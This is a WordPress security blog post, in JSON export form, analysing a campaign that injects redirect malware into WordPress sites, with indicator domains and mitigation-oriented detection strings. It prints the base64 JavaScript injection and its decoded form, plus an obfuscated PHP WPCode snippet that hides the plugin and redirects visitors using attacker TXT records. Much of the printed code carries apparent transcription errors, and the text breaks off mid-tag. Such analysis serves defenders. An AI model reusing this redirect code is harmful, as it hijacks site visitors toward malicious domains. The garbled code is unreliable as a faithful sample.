{"id":351,"date":"2024-05-04T10:39:39","date_gmt":"2024-05-04T10:39:39","guid":{"rendered":"https:\/\/elyspace.com\/blog\/?p=351"},"modified":"2024-06-21T09:10:37","modified_gmt":"2024-06-21T09:10:37","slug":"javascript-malware-tactics-tds-server-side","status":"publish","type":"post","link":"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/","title":{"rendered":"JavaScript Malware Tactics: TDS, Server-Side Redirects &amp; DNS TXT Records"},"content":{"rendered":"\n<p>JavaScript Malware Tactics: There&#8217;s a new harmful campaign attacking WordPress sites. It added dangerous JavaScript code to these sites, which then sent visitors to harmful VexTrio domains. What&#8217;s interesting about this malware is that it used dynamic DNS TXT records from the tracker-cloud[.]com domain to get new redirect URLs.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"540\" src=\"https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1.jpg\" alt=\"Image: Ensure you're a human by simply tapping on the &quot;allow' button.\" class=\"wp-image-374\" srcset=\"https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1.jpg 960w, https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1-300x169.jpg 300w, https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1-768x432.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Since then, we&#8217;ve observed how the campaign is changing the way it hides its actions and the domain names it uses to direct traffic.<\/p>\n\n\n\n<p>In March, there was a major change when the campaign started redirecting traffic through the server instead of the client side.<\/p>\n\n\n\n<p>In this article, we will explore these recent changes in methods and functions. We will also highlight common signs of a security breach and malicious domains to be cautious of. Plus, we will offer steps to reduce the risk and protect your website and server from these threats.<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_82_2 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Exploring_Scope_and_Detection\" >Exploring Scope and Detection<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#DNS_Traffic_Distribution_System_TDS_Domain_Names\" >DNS Traffic Distribution System (TDS) Domain Names<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Redirects_On_Client-side\" >Redirects On Client-side<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Redirects_On_Server-side\" >Redirects On Server-side<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Malicious_PHP_Snippets_within_WPCode\" >Malicious PHP Snippets within WPCode<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Basic_Functionality_of_Redirect\" >Basic Functionality of Redirect<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#A_Request_related_to_DNS_TXT_Record\" >A Request related to DNS TXT Record<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#URL_Redirection_within_TXT_Records\" >URL Redirection within TXT Records<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Elusive_Techniques_and_Backdoor_Functionality\" >Elusive Techniques and Backdoor Functionality<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Backdoor_That_is_Cookie_Based\" >Backdoor That is Cookie Based<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Persistence_of_Malware\" >Persistence of Malware<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#User-Agents_and_Proxies\" >User-Agents and Proxies<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Steps_Of_Mitigation\" >Steps Of Mitigation<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/#Conclusion\" >Conclusion<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Exploring_Scope_and_Detection\"><\/span>Exploring Scope and Detection<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>The most infections were found in February 2024, when 9,222 sites were infected in just that month. Right now, a URLScan.io search shows that thousands of websites are still infected with this malware.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"DNS_Traffic_Distribution_System_TDS_Domain_Names\"><\/span>DNS Traffic Distribution System (TDS) Domain Names<span class=\"ez-toc-section-end\"><\/span><\/h1>\n\n\n\n<p>The following domain names are used as Traffic Distribution System (TDS) with dynamic DNS resolvers:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>cloud-stats[.]com<\/strong>: This domain was created on March 13, 2024, and has been in use since March 13, 2024.<\/li>\n\n\n\n<li><strong>host-stats[.]io<\/strong>: Created on March 5, 2024, this domain has been operational since March 5, 2024.<\/li>\n\n\n\n<li><strong>logsmetrics[.]com<\/strong>: Created on December 6, 2023, it has been in use since December 18, 2023.<\/li>\n\n\n\n<li><strong>ads-promo[.]com<\/strong>: Created on August 23, 2023, it has been operational since October 13, 2023.<\/li>\n\n\n\n<li><strong>tracker-cloud[.]com<\/strong>: Created on July 12, 2023, this domain has been in use since July 17, 2023.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Redirects_On_Client-side\"><\/span>Redirects On Client-side<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Here&#8217;s a glimpse into the latest iteration of client-side injection techniques: a method commonly used by cyber attackers to compromise websites and spread malware. Take a closer look at how malicious scripts are injected into web pages, posing a serious threat to online security.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-b3ca23064ecdda960072e4f479cf43c6\" style=\"background-color:#310549\">&lt;script src=\"data:text\/javascript;base64, KGZ1bmN0aW9uIChwYXJhbWV0ZXJzKSB7DQogICAgZm<br>V0Y2goJ2h0dHBz0i8vYXBpNjQuaXBpZnkub3JnP2Zvcm1hdD1qc29uJykudGhlbihyZXNwb25zZSA9PiByZ<br>XNwb25zZS5qc29uKCkpLnRoZW4oDQogICAgICAgIGlwIDO+IHsNCiAgICAgICAgICAgIGxldCBob3N0ID0g<br>d2luZG93LmxvY2F0aW9uLmhvc3RuYW1l0w0KICAgICAgICAgICAgaXAgPSBpcC5pcC5yZXBsYWNlQWxsKCc<br>6JywgJy0nKTsNCiAgICAgICAgICAgIGlwID0gaXAucmVwbGFjZUFsbCgnLicsICctJyk7DQogICAgICAgIC<br>AgICBpZiAoaG9zdCA9PSAiIikgaG9zdCA9ICJ1bmsuY29tIjsNCiAgICAgICAgICAgIGZldGNoKCdodHRwc<br>zovL2Rucy5nb29nbGUvcmVzb2x2ZT9uYW1lPScgKyBob3N0ICsgJy4nICsgaXAgKyAnLicgKyBNYXRoLmZs<br>b29yKE1hdGgucmFuZG9tKCkgKiAxMDI0ICogMTAyNCAqIDEWKSArICcuaG9zdC1zdGF0cy5pbyZ0eXBlPXR<br>4dCcpLnRoZW40cmVzcG9uc2UgPT4gcmVzcG9uc2UuanNvbigpKS50aGVuKGRhdGEgPT4gew0KICAgICAgIC<br>AgICAgICAgIGlmIChkYXRhLkFuc3dlciA9PSBudWxsKSB7DQogICAgICAgICAgICAgICAgICAgIHJldHVyb<br>jsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgdmFyIG8gPSAiIjsNCiAgICAgICAgICAg<br>ICAgICBkYXRhLkFuc3dlci5mb3JFYWNoKGVsZW1lbnQgPT4gew0KICAgICAgICAgICAgICAgICAgICBpZiA<br>oZWxlbWVudC50eXBlID09IDE2KSBvICs9IGVsZW1lbnQuZGF0YTsNCiAgICAgICAgICAgICAgICB9KTsNC\u0130<br>AgICAgICAgICAgICAgICBvIDOgYXRvYihvKTsNCiAgICAgICAgICAgICAgICBpZiAoIW8ubGVuZ3ROKSBYZ<br>XR1cm47DQogICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2Uobyk7DQogICAgICAgICAg<br>ICB9KTsNCiAgICAgICAgfQOKICAgICk7DQp9KSgp\"&gt;&lt;\/script&gt;<\/pre>\n\n\n\n<p>Unraveling the code reveals the utilization of dns.google service to fetch TXT records of dynamically generated subdomains linked to the attacker&#8217;s domain. This technique enhances cyber threat detection and mitigation strategies.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-843e2fd479aae928aa3d5b18a64579b5\" style=\"background-color:#310549\">(function (parameters) {<br>    fetch('https:\/\/api64.ipify.org?format=json').then(response =&gt; response.json()).then(<br>        ip =&gt; {<br>            let host = window.location.hostname;<br>            ip = ip.ip.replaceAll(':', '-');<br>            ip = ip.replaceAll('.', '-');<br>            if (host == \"\") host = \"unk.com\";<br>            fetch('https:\/\/dns.google\/resolve?name=' + host + '.' + ip + '.' + Math.floor(Math.random() * 1024 * 1024 * 10) + '.host-stats[.]io&amp;type=txt').then(response =&gt; response.json()).then(data =&gt; {<br>                if (data.Answer == null) {<br>                    return;<br>                }<br>                var o = \"\";<br>                data.Answer.forEach(element =&gt; {<br>                    if (element.type == 16) o += element.data;<br>                });<br>                o = atob(o);<br>                if (!o.length) return;<br>                window.location.replace(o);<br>            });<br>        }<br>    );<br>})()  <\/pre>\n\n\n\n<p>Here&#8217;s what you can expect from the dns.google server:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-452b698524c9af03fd5de91b4da7aa09\" style=\"background-color:#310549\">{\"Status\":0,\"TC\":false,\"RD\":true,\"RA\":true,\"AD\":false,\"CD\":false,\"Question\":[{\"name\":\"www.[redacted].com.2600-803-a88-1021--21.1369004.host-stats[.]io.\",\"type\":16}],\"Answer\":[{\"name\":\"www.[redacted].com.2600-803-a88-1021--21.1369004.host-stats[.]io.\",\"type\":16,\"TTL\":600,\"data\":\"aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NvMWtpb2lqdnEzMjdoaG45NnYw\"}],\"Comment\":\"Response from 185.161.248[.]253.\"}<\/pre>\n\n\n\n<p>In the data parameter, we uncover a base64-encrypted string: aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NvMWtpb2lqdnEzMjdoaG45NnYw. This decodes to a suspicious link: hxxps:\/\/web-hosts[.]io\/?co1kioijvq327hhn96v0.<\/p>\n\n\n\n<p>Since March, web-hosts[.]io has been consistently utilized in redirecting users as part of a malware campaign. Noteworthy is the IP address linked: 185.161.248[.]253 (KISARA-AS, RU), hosting numerous domains involved in this malware&#8217;s redirection tactics.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Redirects_On_Server-side\"><\/span>Redirects On Server-side<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>After March 13, 2024, a noticeable trend emerged: website visitors were being redirected to the same destination, web-hosts[.]io. Surprisingly, this time, the redirects were executed server-side without any involvement of JavaScript injections.<\/p>\n\n\n\n<p>Upon thorough investigation, we uncovered the source of these server-side redirects. It was a PHP adaptation of a notorious JavaScript injection method seen in previous cyber-attacks. The attackers utilized a similar approach, embedding a custom code snippet within the WPCode plugin (formerly Insert Headers and Footers by WPBeginner), a popular tool with over 2 million installations worldwide.<\/p>\n\n\n\n<p>As per statistics from the official WordPress plugin repository, WPCode facilitates the injection of custom JavaScript, HTML, CSS, and PHP code snippets into WordPress websites. However, in this instance, attackers abused compromised systems to install this plugin surreptitiously.<\/p>\n\n\n\n<p>Unlike previous tactics involving JavaScript snippets, the attackers opted for PHP snippets to cloak their malicious activities. This strategy rendered the malicious code invisible to external scanners, as only the redirect itself could be detected. Moreover, the intricacies of the Traffic Distribution System (TDS) logic, which tracks visitor IPs, added another layer of complexity, making it challenging to replicate the redirects.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Malicious_PHP_Snippets_within_WPCode\"><\/span>Malicious PHP Snippets within WPCode<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Let me illustrate how harmful code, sneaked in as a WPCode PHP snippet, can lurk within the WordPress admin interface, posing a threat to your website&#8217;s security and functionality.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-274b2f8476cea300e159e113c1b9e98e\" style=\"background-color:#310549\">\/&gt;WPCode<br>Edit Snippet<br>Untitled Snippet<br>Code Preview<br><br>&lt;?php<br>1 $p0=base64 decode('MjMyZThlZTg2MGY3N2VmMDZjNGQ5NWFhZTIzOTU4NGU='); if(current user can (base64 decode('YWRtaW5pc3R yYXRvcg==)) &amp;&amp;!array key exists(base64 decode('c2hvd19hbGw='),S GET))<br>{add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg=='); echo base64 decode('13RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ=='); echo<br>base64 decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF50iBub2510y89'); echo<br>base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ=='); echo<br>base64_decode('PC9zdHlsZT4=');}); add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($q1)<br>(<br>unset($q1[base64 decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]); return $ql;});}if(!function_exists(base64 decode('X3J1ZA==')))<br>{error_reporting(0); ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0); function gcookie($p2)<br>{return(isset($ COOKIE[$p2]))?<\/pre>\n\n\n\n<p>You can now spot these useful snippets marked as &#8216;Untitled Snippets.&#8217;<\/p>\n\n\n\n<p>Injected code may change slightly across websites, yet its fundamental function remains unchanged. Let&#8217;s explore a simple example:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-b748ec0107ad31b2bd21fa05087c3357\" style=\"background-color:#310549\">if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0); ini_set(base64_decode('<br>ZGlzcGxheV9lcnJvcnM='),0); function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm<br>9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZ<br>XxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8 d2Vib3N8d29zKS9p'), $_SERVER [base64_decode('SFRUUF9VU\u00d8VSX0FHRU5U')]); } function is iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='), $_SERVER[base64_decode('SFRUUF9VU\u00d8VSX0FHRU5U*) ]); } function _user_ip() {foreach(array(base64_decode('SFRUUF9DR19DT050RUNUSUSHX0lQ'), base64_decode(' SFRUUF9DTELFTlRfSVA='), base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='), base64_decode(' SFRUUF9YXOZPUldBUKRFRA=='), base64_decode('SFRUUF9YX0NMVVNURVJfQ0XJRU5UX0lQ'),base64_decode(' SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI=')) as $co){if(array_key_exists($c0, $_SERVER) &amp;&amp;!empty($_SERVER[$c0])){foreach(explode(base64_decode(' LA=='), $_SERVER[$c0])as $q1){$q1=trim($q1); if(filter_var($q1, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)!==false){return $q1;}}}}return false;}function _red(){if(!is_user_logged_in()){$q1=_user_ip();if(!$q1){return;}$k2=get_transient(base64_decode(' ZXhw')); if(!is_array($k2)){$k2=array(); } foreach($k2 as $g3=&gt;$14){if(time()-$14&gt;86400){unset($k2 [$g3 ]);}}if(key_exists($q1,$k2)&amp;&amp;(time()-$k2[$q1]&lt;86400)){return;}$y5=filter_var(parse_url( base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN); $v6=str_replace(base64_decode('0g=='), base64_decode('LQ=='),$q1); $v6= str_replace(base64_decode('Lg=='), base64_decode('LQ=='), $v6); $h7=_is_iphone()?base64_decode('aQ== ') : base64_decode('bQ=='); $o8=(!$y5?base64_decode('dW5rLmNvbQ='):$y5).base64_decode('Lg==').(!$v6? base64_decode('MCOWLTATMA=='): $v6).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg== ').(_is_mobile()?base64_decode('bg==').$h7: base64_decode('bmQ=')).base64_decode(' LmNsb3VkLXN0YXRzLmNvbQ=='); $u9=dns_get_record($08, DNS_TXT); if(is_array($u9)&amp;&amp;!empty($u9)){if(isset( $u9 [0] [base64_decode('dHh0')])){$u9=$u9 [0] [base64_decode('dHh0')]; $u9=base64_decode($u9); if($u9 base64_decode('ZXJy')){$k2[$q1]=time();set_transient(base64_decode('ZXhw'),$k2); }else if (substr($u9 ,0,4)==base64_decode('aHR0cA==')){$k2 [$q1]=time(); set_transient(base64_decode('ZXhw'),$k2); wp_redirect($u9); exit;}}}}} add_action(base64_decode('aW5pdA=='), base64_decode('X3JLZA==')); }<\/pre>\n\n\n\n<p>Discovering more advanced versions of this issue might require a closer look. While they may contain extra code, they often stand out due to heavy reliance on the base64_decode function for decoding strings.<\/p>\n\n\n\n<p>To identify these, consider manually scanning your database for the following suspicious strings:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-7a47ac818ece3a30ca54a4daab5ac40e\" style=\"background-color:#310549\">add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));<\/pre>\n\n\n\n<p>The string is decoded to:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-438a3456874150558f1476c7a13c9cb4\" style=\"background-color:#310549\">add_action('init','_red');<\/pre>\n\n\n\n<p>And:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-dc502e6ea2a4dc3d5c9865857cebdf48\" style=\"background-color:#310549\">if(!function_exists(base64_decode('X3JlZA=='))){<\/pre>\n\n\n\n<p>That decodes to:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-efe2a6783ad075406b161821e482bd6a\" style=\"background-color:#310549\">if(!function_exists('_red')){<\/pre>\n\n\n\n<p>Another clear indication that your website might be infected is the presence of the DNS_TXT flag within the dns_get_record() function. When you see this flag, it&#8217;s like a red flag waving, signaling potential trouble. This function is a tool used to gather information about DNS records, and when the DNS_TXT flag appears, it often means that your site&#8217;s DNS records have been tampered with or compromised. This could lead to security breaches or unauthorized access to your website. If you notice this flag, it&#8217;s crucial to take immediate action to investigate and resolve any potential security threats. Ignoring it could leave your website vulnerable to further attacks and damage.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-7b26f26ac64a805f20a4d3658b3a9637\" style=\"background-color:#310549\">dns_get_record($p9,DNS_TXT);<\/pre>\n\n\n\n<p><em>Note :Please be aware that the variable name used in the example below might vary depending on the website you&#8217;re working with. This is common practice across different sites and platforms.<\/em><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Basic_Functionality_of_Redirect\"><\/span>Basic Functionality of Redirect <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>When decoded, the critical segment of the malware appears as follows:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-7a3029f0e8c90a84e069ff86ff52b1b9\" style=\"background-color:#310549\">function _red(){<br>if(!is_user_logged_in()){<br>$q1=_user_ip();<br>if(!$q1){<br>return;<br>}<br>$k2=get_transient('exp');<br>if(!is_array($k2)){<br>$k2=array();<br>}<br>foreach($k2 as $g3=&gt;$14){<br>if(time()-$14&gt;86400){ \/\/ more than 24 hours<br>unset($k2 [$g3]);<br>}<br>}<br>if (key_exists($q1,$k2)&amp;&amp;(time()-$k2[$q1]&lt;86400)) { \/\/less than 24 hours<br>return;<br>}<br>$y5=filter_var(parse_url('https:\/\/'.$_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN);<br>$v6=str_replace(':','', $q1);<br>$v6=str_replace('.', '-', $v6);<br>$h7=_is_iphone()?'i':'m';<br>$08=(!$y5?'unk.com':$y5).'.'.(!$v6?10-0-0-0':$v6).'.'.mt_rand(100000,999999)..(<br>_is_mobile()?'n'.$h7: 'nd').'.cloud-stats.com';<br>$u9=dns_get_record($08,DNS_TXT);<br>if(is_array($u9)&amp;&amp;!empty($u9)){<br>if(isset($u9[0]['txt'])){<br>$u9=$u9 [0]['txt'];<br>$u9-base64_decode($u9);<br>if($u9='err') {<br>$k2[$q1]=time();<br>}<br>set_transient('exp', $k2);<br>else<br>if(substr($u9,0,4)='http'){<br>$k2[$q1]=time();<br>set_transient('exp',$k2);<br>wp_redirect($u9);<br>exit;<br>}<br>}<br>}<br>}<br>}<br>add_action('init','_red');<\/pre>\n\n\n\n<p>Here&#8217;s a useful piece of code that sets up the _red() function to execute whenever a webpage loads, just before it sends any headers.<\/p>\n\n\n\n<p>This function is cleverly designed to check if the visitor is not logged in (a tactic to avoid detection by site owners) and whether it&#8217;s their first visit within the past 24 hours.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"A_Request_related_to_DNS_TXT_Record\"><\/span>A Request related to DNS TXT Record<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>When these certain conditions are fulfilled, the malware creates a unique subdomain on the attacker&#8217;s domain, &#8216;cloud-stats[.]com&#8217;. Following this, it asks for the TXT record of this generated subdomain:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-b571e9807e089ba7d7c73fccc1cbbaf4\" style=\"background-color:#310549\">$o8=(!$y5?'unk.com':$y5).'.'.(!$v6?'0-0-0-0':$v6).'.'.<strong>mt_rand<\/strong>(100000,999999).\u2019.\u2019.(_is_mobile()?'n'.$h7:'nd').'.cloud-stats[.]com';\n$u9=<strong>dns_get_record<\/strong>($o8,DNS_TXT);<\/pre>\n\n\n\n<p>Here\u2019s what makes up the generated subdomain:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The domain name of the infected site (or \u2018unk.com\u2019 if it can\u2019t be identified\u2019)<\/li>\n\n\n\n<li>The IP address of the visitor, but with periods and colons replaced by dashes<\/li>\n\n\n\n<li>A random number ranging from 100,000 to 999,999<\/li>\n\n\n\n<li>A platform marker indicating the device used:\n<ul class=\"wp-block-list\">\n<li>&#8216;ni&#8217; for iPhones<\/li>\n\n\n\n<li>&#8216;nm&#8217; for other mobile devices<\/li>\n\n\n\n<li>&#8216;nd&#8217; for desktops (not mobile)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>The primary domain, controlled by attackers, is cloud-stats[.]co<\/li>\n<\/ul>\n\n\n\n<p>Putting it all together, a fully generated subdomain might look like this: www.example.com.127-0-0-1.243385.ni.cloud-stats[.]com<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"URL_Redirection_within_TXT_Records\"><\/span>URL Redirection within TXT Records<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Here is the particular response to the TXT record requests of malware:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-4f54a2d56271f132096385942f2ee8c7\" style=\"background-color:#310549\"><strong>type<\/strong>:&nbsp; 16 aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NucG43YmFqdnEzZTdvNWtxNXQw;<strong>type<\/strong>:&nbsp; 2 ns1.cloud-stats[.]<strong>com<\/strong>;<strong>type<\/strong>:&nbsp; 2 ns2.cloud-stats[.]<strong>com<\/strong>;95.216.232.139;185.161.248.253;<\/pre>\n\n\n\n<p>Discovering the redirect URL (hxxps:\/\/web-hosts[.]io\/?cnpn7bajvq3e7o5kq5t0), encoded as a base64 string aHR0cHM6Ly93ZWItaG9\u2026, reveals crucial information. Additionally, we uncover the IPs of the name servers: the well-known 185.161.248[.]253 (KISARA-AS, RU) and 95.216.232[.]139 (HETZNER-AS, DE).<\/p>\n\n\n\n<p>Once the redirect URL is fetched from the cloud-stats[.]com DNS server, visitors are automatically rerouted there through the wp_redirect function.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Elusive_Techniques_and_Backdoor_Functionality\"><\/span>Elusive Techniques and Backdoor Functionality<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Injected PHP scripts may come with extra functionalities. One frequent addition is code that conceals the WPCode plugin (insert-headers-and-footers\/ihaf.php) within the installed plugins list.<\/p>\n\n\n\n<p>This tactic thwarts detection and deactivation attempts by website owners who didn&#8217;t install the plugin themselves. An unintended consequence is that even legitimate users of the plugin may find it hidden.<\/p>\n\n\n\n<p>To further obscure the WPCode plugin, the malware modifies its notifications and messages on the WordPress dashboard, making them invisible by altering their display styles to { display: none; }.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Backdoor_That_is_Cookie_Based\"><\/span>Backdoor That is Cookie Based<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Newer versions of this malicious software boast added features, including a backdoor function enabling attackers to transmit data to the script through base64-encoded cookies:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color 